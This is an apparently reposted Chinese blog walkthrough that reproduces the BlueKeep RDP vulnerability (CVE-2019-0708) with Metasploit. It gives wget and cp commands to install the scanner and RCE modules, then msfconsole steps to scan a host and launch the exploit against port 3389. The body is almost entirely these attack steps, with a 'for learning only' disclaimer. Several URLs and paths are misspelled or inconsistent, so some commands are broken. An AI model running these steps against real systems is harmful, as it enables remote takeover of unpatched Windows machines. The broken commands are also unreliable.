首页 > 其他 > 详细

Reproduction CVE_2019_0708

时间:2019-09-13 14:30:23      阅读:112      评论:0      收藏:0      [点我收藏+]

 

Xx_introduction

  • Please protection,respect,love,"China‘s Internet Security Act"!
  • For learning reference only!
  • Please indicate the source!

Ax_Preparation

  1. wget https://github.com/rapid7/metasploit-framework/edb7e0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/explot/rdp.rb
  2. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scaner.rb
  3. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
  4. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  5. cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
  6. cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
  7. cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
  8. cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auiliary/scanner/rdp/

Bx_Scan

  • MSF update
    1
    apt-get update 2 apt-get install metasploit-framework

     

  • 1 su root
    2 msfconsole
    3 reload_all
    4 search 0708
    5 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    6 set rhosts xxx
    7 run

    技术分享图片

Cx_Exploit

1 use windows/rdp/cve_2019_0708_bluekeep_rce 2 set rhost xxx 3 set target xxx 4 set rport 3389 5 exploit

技术分享图片

  • once again

技术分享图片

 

 

 

 技术分享图片

 

 

技术分享图片

 

Reproduction CVE_2019_0708

原文:https://www.cnblogs.com/enomothem/p/11516626.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!